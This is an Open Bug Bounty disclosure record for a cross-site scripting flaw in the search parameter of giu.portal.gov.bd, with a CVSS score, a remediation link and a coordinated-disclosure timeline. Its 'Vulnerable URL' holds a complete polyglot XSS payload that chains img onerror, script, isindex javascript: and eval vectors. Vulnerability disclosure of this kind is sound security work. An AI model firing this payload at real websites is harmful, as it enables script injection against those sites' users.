giu.portal.gov.bd XSS vulnerability

2016-07-26T13:38:00
ID OBB:169495
Type openbugbounty
Reporter XSSbot
Modified 2018-03-15T02:43:00

Description

Open Bug Bounty ID: OBB-169495

Description| Value
---|---
Affected Website:| giu.portal.gov.bd
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://giu.portal.gov.bd/site/search?key=%5B%27%27%5D%22%20%22%3E%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=confirm(/OPENBUGBOUNTY/)%3E%3C/marquee%3E%22%20%3E%3C/plaintext\%3E%3C/|\%3E%3Cplaintext/onmouseover=prompt(/OPENBUGBOUNTY/)%20%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E@gmail.com%3Cisindex%20formaction=javascript:alert(1)%20type=submit%3E%27--%3E%22%20%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cimg/id=%22confirm(%20OPENBUGBOUNTY)%22/alt=%22/%22src=%22/%22onerror=eval(id&%23x29;%3E%27%22%3E%3Cimg%20src=%22http:%20www.openbugbounty.org/images/design/openbugbounty-logo.png%22%3E%20%EF%BF%BC
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 26 July, 2016 13:38 GMT
Vulnerability Verified:| 26 July, 2016 13:42 GMT
Website Operator Notified:| 26 July, 2016 13:42 GMT
Vulnerability Published:| 26 July, 2016 13:42 GMT[without any technical details]
Vulnerability Fixed:| 15 March, 2018 02:43 GMT
Public Disclosure:| 15 March, 2018 02:43 GMT